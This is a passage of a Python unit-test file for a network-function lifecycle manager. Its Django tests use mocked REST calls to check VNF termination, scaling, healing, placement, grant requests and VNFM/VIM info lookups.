from lcm.ns_vnfs.enum import VNF_STATUS, LIFE_CYCLE_OPERATION, RESOURCE_CHANGE_TYPE, VNFC_CHANGE_TYPE, \
INST_TYPE, NETWORK_RESOURCE_TYPE
from lcm.ns_vnfs.biz.place_vnfs import PlaceVnfs
from lcm.ns_vnfs.tests.test_data import vnfm_info, vim_info, vnf_place_request
from lcm.ns_vnfs.tests.test_data import nf_package_info, nsd_model_dict, subscription_response_data
from lcm.ns_vnfs.biz.create_vnfs import CreateVnfs
from lcm.ns_vnfs.biz import create_vnfs, grant_vnf
from lcm.ns_vnfs.biz.update_vnfs import NFOperateService
from lcm.ns_vnfs.biz.verify_vnfs import VerifyVnfs
from lcm.ns.enum import OWNER_TYPE
from lcm.ns_vnfs.biz.handle_notification import HandleVnfLcmOocNotification, HandleVnfIdentifierCreationNotification, \
HandleVnfIdentifierDeletionNotification
from lcm.ns_vnfs.biz.notify_lcm import NotifyLcm
class TestGetVnfViews(TestCase):
def setUp(self):
self.client = Client()
self.nf_inst_id = str(uuid.uuid4())
NfInstModel(nfinstid=self.nf_inst_id, nf_name="vnf1", vnfm_inst_id="1", vnf_id="vnf_id1",
status=VNF_STATUS.ACTIVE, create_time=now_time(), lastuptime=now_time()).save()
def tearDown(self):
NfInstModel.objects.all().delete()
def test_get_vnf(self):
response = self.client.get("/api/nslcm/v1/ns/vnfs/%s" % self.nf_inst_id)
self.assertEqual(status.HTTP_200_OK, response.status_code)
context = json.loads(response.content)
self.assertEqual(self.nf_inst_id, context["vnfInstId"])
class TestTerminateVnfViews(TestCase):
def setUp(self):
self.client = Client()
self.data = {
"terminationType": "forceful",
"gracefulTerminationTimeout": "600"
}
self.ns_inst_id = str(uuid.uuid4())
self.nf_inst_id = "1"
self.vim_id = str(uuid.uuid4())
self.job_id = str(uuid.uuid4())
self.nf_uuid = "111"
self.vnfd_model = {"metadata": {"vnfdId": "1"}}
NSInstModel.objects.all().delete()
NfInstModel.objects.all().delete()
VmInstModel.objects.all().delete()
NSInstModel(id=self.ns_inst_id, name="ns_name").save()
NfInstModel.objects.create(nfinstid=self.nf_inst_id,
vnfm_inst_id="1",
status="active",
mnfinstid=self.nf_uuid,
vnfd_model=self.vnfd_model
)
VmInstModel.objects.create(vmid="1",
vimid='{"cloud_owner": "VCPE", "cloud_regionid": "RegionOne"}',
instid=self.nf_inst_id
)
SubscriptionModel(vnf_instance_filter=self.nf_inst_id, callback_uri="", links="").save()
def tearDown(self):
NSInstModel.objects.all().delete()
NfInstModel.objects.all().delete()
VmInstModel.objects.all().delete()
SubscriptionModel.objects.all().delete()
@mock.patch.object(TerminateVnfs, "run")
def test_terminate_vnf_url(self, mock_run):
req_data = {
"terminationType": "forceful",
"gracefulTerminationTimeout": "600"}
response = self.client.post("/api/nslcm/v1/ns/terminatevnf/%s" % self.nf_inst_id, data=req_data)
self.assertEqual(status.HTTP_202_ACCEPTED, response.status_code)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_terminate_vnf(self, mock_call_req, mock_sleep):
job_id = JobUtil.create_job(JOB_TYPE.VNF, JOB_ACTION.TERMINATE, self.nf_inst_id)
job_info = {
"jobId": job_id,
"responsedescriptor": {"status": JOB_MODEL_STATUS.FINISHED}
}
mock_vals = {
"/external-system/esr-vnfm-list/esr-vnfm/1?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/1/vnfs/111/terminate":
[0, json.JSONEncoder().encode({"jobId": job_id}), "200"],
"/api/ztevnfmdriver/v1/1/jobs/" + job_id + "?responseId=0":
[0, json.JSONEncoder().encode(job_info), "200"],
"/api/resmgr/v1/vnf/1":
[0, json.JSONEncoder().encode({"jobId": job_id}), "200"],
"api/gvnfmdriver/v1/1/subscriptions/":
[0, json.JSONEncoder().encode({}), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
TerminateVnfs(self.data, self.nf_inst_id, job_id).run()
nfinst = NfInstModel.objects.filter(nfinstid=self.nf_inst_id)
if nfinst:
self.assertEqual(1, 0)
else:
self.assertEqual(1, 1)
self.assertEqual(JobModel.objects.get(jobid=job_id).progress, 100)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
@mock.patch.object(SubscriptionDeletion, "send_subscription_deletion_request")
def test_terminate_vnf_when_no_vnf_uuid(self, mock_send_subscription_deletion_request, mock_call_req, mock_sleep):
nf_inst_id = "test_terminate_vnf_when_no_vnf_uuid"
NSInstModel(id=nf_inst_id, name="ns_name_2").save()
NfInstModel.objects.create(nfinstid=nf_inst_id,
vnfm_inst_id="2",
status="active",
vnfd_model=self.vnfd_model
)
VmInstModel.objects.create(vmid="2",
vimid='{"cloud_owner": "VCPE", "cloud_regionid": "RegionOne"}',
instid=nf_inst_id
)
job_id = JobUtil.create_job(JOB_TYPE.VNF, JOB_ACTION.TERMINATE, nf_inst_id)
job_info = {
"jobId": job_id,
"responsedescriptor": {"status": JOB_MODEL_STATUS.FINISHED}
}
mock_vals = {
"/external-system/esr-vnfm-list/esr-vnfm/2?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/2/vnfs/None/terminate":
[0, json.JSONEncoder().encode({"jobId": job_id}), "200"],
"/api/ztevnfmdriver/v1/2/jobs/" + job_id + "?responseId=0":
[0, json.JSONEncoder().encode(job_info), "200"],
"/api/resmgr/v1/vnf/%s" % nf_inst_id:
[0, json.JSONEncoder().encode({"jobId": job_id}), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
TerminateVnfs(self.data, nf_inst_id, job_id).run()
nfinst = NfInstModel.objects.filter(nfinstid=nf_inst_id)
if nfinst:
self.assertEqual(1, 0)
else:
self.assertEqual(1, 1)
self.assertEqual(JobModel.objects.get(jobid=job_id).progress, 100)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
@mock.patch.object(SubscriptionDeletion, "send_subscription_deletion_request")
def test_terminate_vnf_when_nf_not_exists(self, mock_send_subscription_deletion_request, mock_call_req, mock_sleep):
job_id = JobUtil.create_job(JOB_TYPE.VNF, JOB_ACTION.TERMINATE, self.nf_inst_id)
TerminateVnfs(self.data, "nf_not_exists", job_id).run()
nfinst = NfInstModel.objects.filter(nfinstid="nf_not_exists")
if nfinst:
self.assertEqual(1, 0)
else:
self.assertEqual(1, 1)
self.assertEqual(JobModel.objects.get(jobid=job_id).progress, 255)
def test_terminate_vnf_when_vnf_is_dealing(self):
NfInstModel.objects.filter(nfinstid=self.nf_inst_id).update(status=VNF_STATUS.TERMINATING)
job_id = JobUtil.create_job(JOB_TYPE.VNF, JOB_ACTION.TERMINATE, self.nf_inst_id)
TerminateVnfs(self.data, self.nf_inst_id, job_id).run()
self.assertEqual(NfInstModel.objects.get(nfinstid=self.nf_inst_id).status, VNF_STATUS.FAILED)
self.assertEqual(JobModel.objects.get(jobid=job_id).progress, 255)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
@mock.patch.object(SubscriptionDeletion, "send_subscription_deletion_request")
def test_terminate_vnf_when_job_error(self, mock_send_subscription_deletion_request, mock_call_req, mock_sleep):
job_id = JobUtil.create_job(JOB_TYPE.VNF, JOB_ACTION.TERMINATE, self.nf_inst_id)
job_info = {
"jobId": job_id,
"responsedescriptor": {"status": JOB_MODEL_STATUS.ERROR}
}
mock_vals = {
"/external-system/esr-vnfm-list/esr-vnfm/1?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/1/vnfs/111/terminate":
[0, json.JSONEncoder().encode({"jobId": job_id}), "200"],
"/api/ztevnfmdriver/v1/1/jobs/" + job_id + "?responseId=0":
[0, json.JSONEncoder().encode(job_info), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
TerminateVnfs(self.data, self.nf_inst_id, job_id).run()
self.assertEqual(NfInstModel.objects.get(nfinstid=self.nf_inst_id).status, VNF_STATUS.FAILED)
self.assertEqual(JobModel.objects.get(jobid=job_id).progress, 255)
class TestScaleVnfViews(TestCase):
def setUp(self):
self.client = Client()
self.nf_inst_id = str(uuid.uuid4())
self.url = "/api/nslcm/v1/ns/ns_vnfs/%s/scaling" % self.nf_inst_id
self.data = {
"scaleVnfData":
{
"type": "SCALE_OUT",
"aspectId": "demo_aspect1",
"numberOfSteps": 1,
"additionalParam": {}
}
}
NfInstModel.objects.create(nfinstid=self.nf_inst_id, vnfm_inst_id="vnfm_inst_id_001",
mnfinstid="m_nf_inst_id_001")
def tearDown(self):
NfInstModel.objects.all().delete()
# def test_scale_vnf_view(self):
# response = self.client.post(self.url, self.data)
# self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_scale_vnf_success(self, mock_call_req, mock_sleep):
scale_service = NFManualScaleService(self.nf_inst_id, self.data)
job_info = {
"jobId": scale_service.job_id,
"responsedescriptor": {"status": JOB_MODEL_STATUS.FINISHED}
}
mock_vals = {
"/external-system/esr-vnfm-list/esr-vnfm/vnfm_inst_id_001?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/vnfm_inst_id_001/vnfs/m_nf_inst_id_001/scale":
[0, json.JSONEncoder().encode({"jobId": scale_service.job_id}), "200"],
"/api/ztevnfmdriver/v1/vnfm_inst_id_001/jobs/" + scale_service.job_id + "?responseId=0":
[0, json.JSONEncoder().encode(job_info), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
scale_service.run()
nsIns = NfInstModel.objects.get(nfinstid=self.nf_inst_id)
self.assertEqual(nsIns.status, VNF_STATUS.ACTIVE)
jobs = JobModel.objects.get(jobid=scale_service.job_id)
self.assertEqual(JOB_PROGRESS.FINISHED, jobs.progress)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_scale_vnf_when_job_fail(self, mock_call_req, mock_sleep):
scale_service = NFManualScaleService(self.nf_inst_id, self.data)
job_info = {
"jobId": scale_service.job_id,
"responsedescriptor": {"status": JOB_MODEL_STATUS.ERROR}
}
mock_vals = {
"/external-system/esr-vnfm-list/esr-vnfm/vnfm_inst_id_001?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/vnfm_inst_id_001/vnfs/m_nf_inst_id_001/scale":
[0, json.JSONEncoder().encode({"jobId": scale_service.job_id}), "200"],
"/api/ztevnfmdriver/v1/vnfm_inst_id_001/jobs/" + scale_service.job_id + "?responseId=0":
[0, json.JSONEncoder().encode(job_info), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
scale_service.run()
nsIns = NfInstModel.objects.get(nfinstid=self.nf_inst_id)
self.assertEqual(nsIns.status, VNF_STATUS.ACTIVE)
jobs = JobModel.objects.get(jobid=scale_service.job_id)
self.assertEqual(JOB_PROGRESS.ERROR, jobs.progress)
def test_scale_vnf_when_exception(self):
req_data = {
"scaleVnfData": [
{
"type": "SCALE_OUT",
"aspectId": "demo_aspect1",
"numberOfSteps": 1,
},
{
"type": "SCALE_OUT",
"aspectId": "demo_aspect2",
"numberOfSteps": 1,
}
]
}
scale_service = NFManualScaleService(self.nf_inst_id, req_data)
scale_service.run()
nsIns = NfInstModel.objects.get(nfinstid=self.nf_inst_id)
self.assertEqual(nsIns.status, VNF_STATUS.ACTIVE)
jobs = JobModel.objects.get(jobid=scale_service.job_id)
self.assertEqual(JOB_PROGRESS.ERROR, jobs.progress)
def test_scale_vnf_when_nf_instance_does_not_exist(self):
req_data = {
"scaleVnfData":
{
"type": "SCALE_OUT",
"aspectId": "demo_aspect1",
"numberOfSteps": 1,
}
}
scale_service = NFManualScaleService("nf_instance_does_not_exist", req_data)
scale_service.run()
jobs = JobModel.objects.get(jobid=scale_service.job_id)
self.assertEqual(JOB_PROGRESS.ERROR, jobs.progress)
def test_scale_vnf_when_scale_vnf_data_does_not_exist(self):
req_data = {
"scaleVnfData": {}
}
scale_service = NFManualScaleService(self.nf_inst_id, req_data)
scale_service.run()
nsIns = NfInstModel.objects.get(nfinstid=self.nf_inst_id)
self.assertEqual(nsIns.status, VNF_STATUS.ACTIVE)
jobs = JobModel.objects.get(jobid=scale_service.job_id)
self.assertEqual(JOB_PROGRESS.ERROR, jobs.progress)
class TestHealVnfViews(TestCase):
def setUp(self):
self.client = Client()
self.ns_inst_id = str(uuid.uuid4())
self.nf_inst_id = str(uuid.uuid4())
self.nf_uuid = "111"
self.data = {
"action": "vmReset",
"affectedvm": {
"vmid": "1",
"vduid": "1",
"vmname": "name",
},
"additionalParams": {
"actionvminfo": {
"vmid": "vm_id_001",
}
}
}
NSInstModel(id=self.ns_inst_id, name="ns_name").save()
NfInstModel.objects.create(nfinstid=self.nf_inst_id, status=VNF_STATUS.NULL, vnfm_inst_id="vnfm_inst_id_001",
mnfinstid="m_nf_inst_id_001")
NfInstModel.objects.create(nfinstid="non_vud_id", status=VNF_STATUS.NULL, vnfm_inst_id="vnfm_inst_id_001",
mnfinstid="m_nf_inst_id_001")
VNFCInstModel.objects.create(nfinstid=self.nf_inst_id, vmid="vm_id_001", vduid="vdu_id_001")
VmInstModel.objects.create(resouceid="vm_id_001", vmname="vm_name_001")
def tearDown(self):
NSInstModel.objects.all().delete()
NfInstModel.objects.all().delete()
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_heal_vnf_success(self, mock_call_req, mock_sleep):
heal_service = NFHealService(self.nf_inst_id, self.data)
mock_vals = {
"/test/bins/1?timeout=15000":
[0, json.JSONEncoder().encode(['{"powering-off": "", "instance_id": "vm_id_001", '
'"display_name": ""}']), "200"],
"/external-system/esr-vnfm-list/esr-vnfm/vnfm_inst_id_001?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/vnfm_inst_id_001/vnfs/m_nf_inst_id_001/heal":
[0, json.JSONEncoder().encode({"jobId": heal_service.job_id}), "200"],
"/api/ztevnfmdriver/v1/vnfm_inst_id_001/jobs/" + heal_service.job_id + "?responseId=0":
[0, json.JSONEncoder().encode({
"jobId": heal_service.job_id,
"responsedescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"responsehistorylist": [{
"progress": "0",
"status": JOB_MODEL_STATUS.PROCESSING,
"responseid": "2",
"statusdescription": "creating",
"errorcode": "0"
}]
}
}), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
heal_service.run()
self.assertEqual(NfInstModel.objects.get(nfinstid=self.nf_inst_id).status, VNF_STATUS.ACTIVE)
jobs = JobModel.objects.get(jobid=heal_service.job_id)
self.assertEqual(JOB_PROGRESS.FINISHED, jobs.progress)
def test_heal_vnf_when_non_existing_vnf(self, ):
heal_service = NFHealService("on_existing_vnf", self.data)
heal_service.run()
self.assertEqual(NfInstModel.objects.get(nfinstid=self.nf_inst_id).status, VNF_STATUS.NULL)
jobs = JobModel.objects.get(jobid=heal_service.job_id)
self.assertEqual(JOB_PROGRESS.ERROR, jobs.progress)
def test_heal_vnf_when_additional_params_non_exist(self):
data = {"action": "vmReset"}
heal_service = NFHealService(self.nf_inst_id, data)
heal_service.run()
self.assertEqual(NfInstModel.objects.get(nfinstid=self.nf_inst_id).status, VNF_STATUS.NULL)
jobs = JobModel.objects.get(jobid=heal_service.job_id)
self.assertEqual(JOB_PROGRESS.ERROR, jobs.progress)
def test_heal_vnf_when_non_vud_id(self, ):
heal_service = NFHealService("non_vud_id", self.data)
heal_service.run()
self.assertEqual(NfInstModel.objects.get(nfinstid="non_vud_id").status, VNF_STATUS.NULL)
jobs = JobModel.objects.get(jobid=heal_service.job_id)
self.assertEqual(JOB_PROGRESS.ERROR, jobs.progress)
@mock.patch.object(restcall, "call_req")
def test_heal_vnf_when_no_vnfm_job_id(self, mock_call_req):
heal_service = NFHealService(self.nf_inst_id, self.data)
mock_vals = {
"/test/bins/1?timeout=15000":
[0, json.JSONEncoder().encode(['{"powering-off": "", "instance_id": "vm_id_001", '
'"display_name": ""}']), "200"],
"/external-system/esr-vnfm-list/esr-vnfm/vnfm_inst_id_001?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/vnfm_inst_id_001/vnfs/m_nf_inst_id_001/heal":
[0, json.JSONEncoder().encode({}), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
heal_service.run()
self.assertEqual(NfInstModel.objects.get(nfinstid=self.nf_inst_id).status, VNF_STATUS.ACTIVE)
jobs = JobModel.objects.get(jobid=heal_service.job_id)
self.assertEqual(JOB_PROGRESS.FINISHED, jobs.progress)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_heal_vnf_when_job_bot_finish(self, mock_call_req, mock_sleep):
heal_service = NFHealService(self.nf_inst_id, self.data)
mock_vals = {
"/test/bins/1?timeout=15000":
[0, json.JSONEncoder().encode(['{"powering-off": "", "instance_id": "vm_id_001", '
'"display_name": ""}']), "200"],
"/external-system/esr-vnfm-list/esr-vnfm/vnfm_inst_id_001?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/vnfm_inst_id_001/vnfs/m_nf_inst_id_001/heal":
[0, json.JSONEncoder().encode({"jobId": heal_service.job_id}), "200"],
"/api/ztevnfmdriver/v1/vnfm_inst_id_001/jobs/" + heal_service.job_id + "?responseId=0":
[0, json.JSONEncoder().encode({
"jobId": heal_service.job_id,
"responsedescriptor": {
"status": JOB_MODEL_STATUS.ERROR,
"responsehistorylist": [{
"progress": "0",
"status": JOB_MODEL_STATUS.PROCESSING,
"responseid": "2",
"statusdescription": "creating",
"errorcode": "0"
}]
}
}), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
heal_service.run()
self.assertEqual(NfInstModel.objects.get(nfinstid=self.nf_inst_id).status, VNF_STATUS.HEALING)
jobs = JobModel.objects.get(jobid=heal_service.job_id)
self.assertEqual(JOB_PROGRESS.ERROR, jobs.progress)
class TestGetVnfmInfoViews(TestCase):
def setUp(self):
self.client = Client()
self.vnfm_id = str(uuid.uuid4())
def tearDown(self):
pass
@mock.patch.object(restcall, "call_req")
def test_get_vnfm_info(self, mock_call_req):
vnfm_info_aai = {
"vnfm-id": "example-vnfm-id-val-62576",
"vim-id": "example-vim-id-val-35114",
"certificate-url": "example-certificate-url-val-90242",
"esr-system-info-list": {
"esr-system-info": [
{
"esr-system-info-id": "example-esr-system-info-id-val-78484",
"system-name": "example-system-name-val-23790",
"type": "example-type-val-52596",
"vendor": "example-vendor-val-47399",
"version": "example-version-val-42051",
"service-url": "example-service-url-val-10731",
"user-name": "example-user-name-val-65946",
"password": "example-password-val-22505",
"system-type": "example-system-type-val-27221",
"protocal": "example-protocal-val-54632",
"ssl-cacert": "example-ssl-cacert-val-45965",
"ssl-insecure": True,
"ip-address": "example-ip-address-val-19212",
"port": "example-port-val-57641",
"cloud-domain": "example-cloud-domain-val-26296",
"default-tenant": "example-default-tenant-val-87724"
}
]
}
}
r1 = [0, json.JSONEncoder().encode(vnfm_info_aai), "200"]
mock_call_req.side_effect = [r1]
esr_system_info = ignore_case_get(ignore_case_get(vnfm_info_aai, "esr-system-info-list"), "esr-system-info")
expect_data = {
"vnfmId": vnfm_info_aai["vnfm-id"],
"name": vnfm_info_aai["vnfm-id"],
"type": ignore_case_get(esr_system_info[0], "type"),
"vimId": vnfm_info_aai["vim-id"],
"vendor": ignore_case_get(esr_system_info[0], "vendor"),
"version": ignore_case_get(esr_system_info[0], "version"),
"description": "vnfm",
"certificateUrl": vnfm_info_aai["certificate-url"],
"url": ignore_case_get(esr_system_info[0], "service-url"),
"userName": ignore_case_get(esr_system_info[0], "user-name"),
"password": ignore_case_get(esr_system_info[0], "password"),
"createTime": ""
}
response = self.client.get("/api/nslcm/v1/vnfms/%s" % self.vnfm_id)
self.assertEqual(status.HTTP_200_OK, response.status_code, response.content)
context = json.loads(response.content)
self.assertEqual(expect_data, context)
class TestGetVimInfoViews(TestCase):
def setUp(self):
self.client = Client()
self.vim_id = {"cloud_owner": "VCPE", "cloud_regionid": "RegionOne"}
def tearDown(self):
pass
@mock.patch.object(restcall, "call_req")
def test_get_vim_info(self, mock_call_req):
r1 = [0, json.JSONEncoder().encode(vim_info), "200"]
mock_call_req.side_effect = [r1]
esr_system_info = ignore_case_get(ignore_case_get(vim_info, "esr-system-info-list"), "esr-system-info")
expect_data = {
"vimId": self.vim_id,
"name": self.vim_id,
"url": ignore_case_get(esr_system_info[0], "service-url"),
"userName": ignore_case_get(esr_system_info[0], "user-name"),
"password": ignore_case_get(esr_system_info[0], "password"),
# "tenant": ignore_case_get(tenants[0], "tenant-id"),
"tenant": ignore_case_get(esr_system_info[0], "default-tenant"),
"vendor": ignore_case_get(esr_system_info[0], "vendor"),
"version": ignore_case_get(esr_system_info[0], "version"),
"description": "vim",
"domain": "",
"type": ignore_case_get(esr_system_info[0], "type"),
"createTime": ""
}
# response = self.client.get("/api/nslcm/v1/vims/%s" % self.vim_id)
response = self.client.get("/api/nslcm/v1/vims/%s/%s" % (self.vim_id["cloud_owner"], self.vim_id["cloud_regionid"]))
self.assertEqual(status.HTTP_200_OK, response.status_code)
context = json.loads(response.content)
self.assertEqual(expect_data["url"], context["url"])
class TestPlaceVnfViews(TestCase):
def setUp(self):
self.vnf_inst_id = "1234"
self.vnf_id = "vG"
self.client = Client()
self.url = "/api/nslcm/v1/ns/placevnf"
self.data = vnf_place_request
OOFDataModel.objects.all().delete()
OOFDataModel.objects.create(
request_id="1234",
transaction_id="1234",
request_status="init",
request_module_name=self.vnf_id,
service_resource_id=self.vnf_inst_id,
vim_id="",
cloud_owner="",
cloud_region_id="",
vdu_info="",
)
def tearDown(self):
OOFDataModel.objects.all().delete()
@mock.patch.object(restcall, "call_req")
def test_place_vnf(self, mock_call_req):
vdu_info_json = [{
"vduName": "vG_0",
"flavorName": "HPA.flavor.1",
"flavorId": "12345",
"directive": []
}]
# response = self.client.post(self.url, data=self.data)
PlaceVnfs(vnf_place_request).extract()
db_info = OOFDataModel.objects.filter(request_id=vnf_place_request.get("requestId"), transaction_id=vnf_place_request.get("transactionId"))
self.assertEqual(db_info[0].request_status, "completed")
self.assertEqual(db_info[0].vim_id, "CloudOwner1_DLLSTX1A")
self.assertEqual(db_info[0].cloud_owner, "CloudOwner1")
self.assertEqual(db_info[0].cloud_region_id, "DLLSTX1A")
self.assertEqual(db_info[0].vdu_info, json.dumps(vdu_info_json))
def test_place_vnf_with_invalid_response(self):
resp = {
"requestId": "1234",
"transactionId": "1234",
"statusMessage": "xx",
"requestStatus": "pending",
"solutions": {
"placementSolutions": [
[
{
"resourceModuleName": self.vnf_id,
"serviceResourceId": self.vnf_inst_id,
"solution": {
"identifierType": "serviceInstanceId",
"identifiers": [
"xx"
],
"cloudOwner": "CloudOwner1 "
},
"assignmentInfo": []
}
]
],
"licenseSolutions": [
{
"resourceModuleName": "string",
"serviceResourceId": "string",
"entitlementPoolUUID": [
"string"
],
"licenseKeyGroupUUID": [
"string"
],
"entitlementPoolInvariantUUID": [
"string"
],
"licenseKeyGroupInvariantUUID": [
"string"
]
}
]
}
}
PlaceVnfs(resp).extract()
db_info = OOFDataModel.objects.filter(request_id=resp.get("requestId"), transaction_id=resp.get("transactionId"))
self.assertEqual(db_info[0].request_status, "pending")
self.assertEqual(db_info[0].vim_id, "none")
self.assertEqual(db_info[0].cloud_owner, "none")
self.assertEqual(db_info[0].cloud_region_id, "none")
self.assertEqual(db_info[0].vdu_info, "none")
def test_place_vnf_with_no_assignment_info(self):
resp = {
"requestId": "1234",
"transactionId": "1234",
"statusMessage": "xx",
"requestStatus": "completed",
"solutions": {
"placementSolutions": [
[
{
"resourceModuleName": self.vnf_id,
"serviceResourceId": self.vnf_inst_id,
"solution": {
"identifierType": "serviceInstanceId",
"identifiers": [
"xx"
],
"cloudOwner": "CloudOwner1 "
}
}
]
],
"licenseSolutions": [
{
"resourceModuleName": "string",
"serviceResourceId": "string",
"entitlementPoolUUID": [
"string"
],
"licenseKeyGroupUUID": [
"string"
],
"entitlementPoolInvariantUUID": [
"string"
],
"licenseKeyGroupInvariantUUID": [
"string"
]
}
]
}
}
PlaceVnfs(resp).extract()
db_info = OOFDataModel.objects.filter(request_id=resp.get("requestId"), transaction_id=resp.get("transactionId"))
self.assertEqual(db_info[0].request_status, "completed")
self.assertEqual(db_info[0].vim_id, "none")
self.assertEqual(db_info[0].cloud_owner, "none")
self.assertEqual(db_info[0].cloud_region_id, "none")
self.assertEqual(db_info[0].vdu_info, "none")
def test_place_vnf_no_directives(self):
resp = {
"requestId": "1234",
"transactionId": "1234",
"statusMessage": "xx",
"requestStatus": "completed",
"solutions": {
"placementSolutions": [
[
{
"resourceModuleName": self.vnf_id,
"serviceResourceId": self.vnf_inst_id,
"solution": {
"identifierType": "serviceInstanceId",
"identifiers": [
"xx"
],
"cloudOwner": "CloudOwner1 "
},
"assignmentInfo": [
{"key": "locationId",
"value": "DLLSTX1A"
}
]
}
]
],
"licenseSoutions": [
{
"resourceModuleName": "string",
"serviceResourceId": "string",
"entitlementPoolUUID": [
"string"
],
"licenseKeyGroupUUID": [
"string"
],
"entitlementPoolInvariantUUID": [
"string"
],
"licenseKeyGroupInvariantUUID": [
"string"
]
}
]
}
}
PlaceVnfs(resp).extract()
db_info = OOFDataModel.objects.filter(request_id=resp.get("requestId"), transaction_id=resp.get("transactionId"))
self.assertEqual(db_info[0].request_status, "completed")
self.assertEqual(db_info[0].vim_id, "none")
self.assertEqual(db_info[0].cloud_owner, "none")
self.assertEqual(db_info[0].cloud_region_id, "none")
self.assertEqual(db_info[0].vdu_info, "none")
def test_place_vnf_with_no_solution(self):
resp = {
"requestId": "1234",
"transactionId": "1234",
"statusMessage": "xx",
"requestStatus": "completed",
"solutions": {
"placementSolutions": [],
"licenseSoutions": []
}
}
PlaceVnfs(resp).extract()
db_info = OOFDataModel.objects.filter(request_id=resp.get("requestId"), transaction_id=resp.get("transactionId"))
self.assertEqual(db_info[0].request_status, "completed")
self.assertEqual(db_info[0].vim_id, "none")
self.assertEqual(db_info[0].cloud_owner, "none")
self.assertEqual(db_info[0].cloud_region_id, "none")
self.assertEqual(db_info[0].vdu_info, "none")
class TestGrantVnfsViews(TestCase):
def setUp(self):
self.vnf_inst_id = str(uuid.uuid4())
self.data = {
"vnfInstanceId": self.vnf_inst_id,
"lifecycleOperation": LIFE_CYCLE_OPERATION.INSTANTIATE,
"addResource": [{"type": RESOURCE_CHANGE_TYPE.VDU, "vdu": "vdu_grant_vnf_add_resources"}],
"additionalParam": {
"vnfmid": "vnfm_inst_id_001",
"vimid": '{"cloud_owner": "VCPE", "cloud_regionid": "RegionOne"}'
}
}
self.client = Client()
self.url = "/api/nslcm/v1/ns/grantvnf"
NfInstModel(mnfinstid=self.vnf_inst_id, nfinstid="vnf_inst_id_001", package_id="package_id_001",
vnfm_inst_id="vnfm_inst_id_001").save()
def tearDown(self):
OOFDataModel.objects.all().delete()
NfInstModel.objects.all().delete()
# @mock.patch.object(restcall, "call_req")
# def test_nf_grant_view(self, mock_call_req):
# mock_vals = {
# "/api/catalog/v1/vnfpackages/package_id_001":
# [0, json.JSONEncoder().encode(nf_package_info), "200"],
# "/api/resmgr/v1/resource/grant":
# [1, json.JSONEncoder().encode({}), "200"],
# "/cloud-infrastructure/cloud-regions/cloud-region/VCPE/RegionOne?depth=all":
# [0, json.JSONEncoder().encode(vim_info), "201"],
# }
#
# def side_effect(*args):
# return mock_vals[args[4]]
#
# mock_call_req.side_effect = side_effect
# data = {
# "vnfInstanceId": self.vnf_inst_id,
# "lifecycleOperation": LIFE_CYCLE_OPERATION.INSTANTIATE
# }
# response = self.client.post(self.url, data=data)
# self.assertEqual(response.status_code, status.HTTP_201_CREATED)
@mock.patch.object(restcall, "call_req")
def test_nf_grant_view_when_add_resource(self, mock_call_req):
mock_vals = {
"/api/catalog/v1/vnfpackages/package_id_001":
[0, json.JSONEncoder().encode(nf_package_info), "200"],
"/api/resmgr/v1/resource/grant":
[1, json.JSONEncoder().encode({}), "200"],
"/cloud-infrastructure/cloud-regions/cloud-region/VCPE/RegionOne?depth=all":
[0, json.JSONEncoder().encode(vim_info), "201"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
resp = GrantVnfs(json.dumps(self.data), "").send_grant_vnf_to_resMgr()
return_success = {"vim": {"accessInfo": {"tenant": "admin"},
"vimId": "example-cloud-owner-val-97336_example-cloud-region-id-val-35532"}}
self.assertEqual(resp, return_success)
@mock.patch.object(restcall, "call_req")
def test_nf_grant_view_when_remove_resource(self, mock_call_req):
mock_vals = {
"/api/catalog/v1/vnfpackages/package_id_001":
[0, json.JSONEncoder().encode(nf_package_info), "200"],
"/api/resmgr/v1/resource/grant":
[1, json.JSONEncoder().encode({}), "200"],
"/cloud-infrastructure/cloud-regions/cloud-region/VCPE/RegionOne?depth=all":
[0, json.JSONEncoder().encode(vim_info), "201"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
self.data.pop("addResource")
self.data["removeResource"] = [{"vdu": "vdu_grant_vnf_remove_resources"}]
resp = GrantVnfs(json.dumps(self.data), "").send_grant_vnf_to_resMgr()
return_success = {"vim": {"accessInfo": {"tenant": "admin"},
"vimId": "example-cloud-owner-val-97336_example-cloud-region-id-val-35532"}}
self.assertEqual(resp, return_success)
class TestGrantVnfViews(TestCase):
def setUp(self):
